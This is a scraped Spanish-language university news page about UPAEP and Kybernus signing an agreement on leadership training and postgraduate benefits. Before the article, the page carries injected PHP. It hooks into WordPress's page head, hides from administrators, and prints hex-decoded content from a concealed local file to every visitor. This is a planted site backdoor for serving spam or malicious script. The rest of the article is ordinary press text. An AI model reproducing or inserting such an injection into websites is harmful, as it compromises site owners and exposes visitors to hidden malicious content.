if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } La pandemia invitó a la gente a reinventarse y a transformar su entorno social – La Opinión Universitaria La Opinión Universitaria
Menu

La pandemia invitó a la gente a reinventarse y a transformar su entorno social

-UPAEP y Kybernus firman convenio de colaboración para la formación de capital humano sustentado en los valores y liderazgo transformador.

El liderazgo transformador llevado a la práctica permitirá dar paso a una sociedad más justa, en donde los ciudadanos puedan contribuir a la constitución del bien común que actualmente hace mucha falta en los diferentes entornos sociales.

UPAEP y Kybernus tienen muchos puntos en común, como son la búsqueda de la excelencia, la búsqueda de personas que puedan incidir en el desarrollo de la comunidad, en la promoción constante de los valores y la formación humanista, aspectos que hacen mucho más fácil este tipo de convenios en donde se buscan objetivos comunes, aseveró Herminio Sánchez de la Barquera y Arroyo, Decano de Ciencias Sociales de la UPAEP.

“Me da gusto que estas dos instituciones lleven a cabo la firma de este convenio, en primera instancia porque la UPAEP es mi casa y por Kybernus, organización que conozco desde hace años atrás y porque sé de sus valores y de su valía en las épocas de crisis”, enfatizó Sánchez de la Barquera.

Externó que colaborando las dos instituciones con lo que saben hacer y con los valores que la guían y de la forma en que lo saben hacer, permite ofrecer diferentes beneficios para la sociedad y para ambas instituciones.

En su intervención, José Carlos Espinoza Lanz, Director de Operaciones e Integración de Kybernus, subrayó que el espíritu de las universidades y su vocación, y en este caso de la UPAEP, que es una institución con valores muy claros y con una vocación social muy importante, al contribuir en la formación de ciudadanos participativos, responsables y comprometidos con la sociedad; y en el caso de Kybernus, lo que busca es impulsar a líderes jóvenes talentosos en todos los estados del país, para que lo que están haciendo lo hagan mejor y tengan una incidencia positiva en sus comunidades.

Dijo que esta comunión de valores que distinguen a estas dos instituciones permite que haya una alineación muy importante y clara de lo que se busca dentro de la sociedad y sienta las bases para una colaboración interesante y que se vea reflejada en el beneficio de los ciudadanos.

Espinoza Lanz señaló que en Kybernus se tiene la certeza de que los liderazgos son los que crean los entornos y posibilitan la creación de entornos para que le vaya mejor a todas las personas, es decir, el papel fundamental de los liderazgos es crear las condiciones tanto en lo político, social, como económico para que la sociedad pueda florecer y desplegar su talento.

UPAEP y Kybernus coinciden en formar ciudadanos líderes sustentados en la ética y en los valores, que tengan un compromiso social y que den vida a esos valores trascendentales como es la libertad, el respeto y la tolerancia entre otros y otro atributo importante es el tema de las capacidades, en donde los liderazgos deben tener capacidades y un compromiso con su aprendizaje de por vida, y por ello la importancia de establecer alianzas con instituciones como la UPAEP que va en esa misma dirección, acotó Espinoza Lanz.

Por su parte, Rocío Jiménez Nolasco, enlace estatal del Colectivo de Kybernus Puebla, destacó que la pandemia del COVID-19 ha obligado a las personas a reinventarse de diferentes formas y contar con instituciones como la UPAEP y Kybernus, ayudan a la gente a salir adelante y enfrentar los retos que se presentan en la vida diaria de una manera más sólida.

Y en ese sentido, UPAEP y Kybernus nacional firman convenio de colaboración, mediante el cual permite fortalecer los lazos entre ambas organizaciones para contribuir a la formación académica de los integrantes de Kybernus y decidan ser parte de esta comunidad universitaria, señaló Eva María Pérez Castrejón,  Jefa de Promoción de Posgrados y Modalidades de la UPAEP.

Agregó que la universidad ofrecerá diferentes beneficios en inscripción y colegiatura a través de los 119 programas académicos de posgrados, de los sistemas semipresencial o en línea. Indicó que en la UPAEP siempre se está al pendiente de ofrecer las mejores opciones educativas y dar diferentes respuestas a las necesidades de la sociedad y en especial a organizaciones como Kybernus que buscan construir en México una cultura de liderazgo basada en valores en coordinación con instituciones públicas y privadas, además de sociales que compartan este objetivo.

Pérez Castrejón reiteró que en la UPAEP se cuenta con programas académicos del área de la salud, de ciencias sociales, ciencias biológicas, artes y humanidades, negocios e ingenierías, programas que se pueden cursar de manera presencial, por videoconferencia o en línea.

Por último, Angélica Vigueras Salgado, asesor ejecutivo del Decanato de Ciencias Sociales de la UPAEP, habló de los beneficios económicos que ofrece la universidad a todos los miembros de Kybernus al cursar alguno de los programas académicos con que cuenta la institución educativa.

Para mayor información, las personas pueden consultar la página web de la universidad, www.upaep.mx; el WhatsApp 22 27 10 72 31 para más información o bien al correo electrónico posgrados@upaep.mx, y las redes sociales upaepposgrados.

También en la conferencia de prensa se contó con la presencia de Beatriz Briones Padilla, enlace estatal del colectivo Kybernus de Tlaxcala.

  • Tweets recientes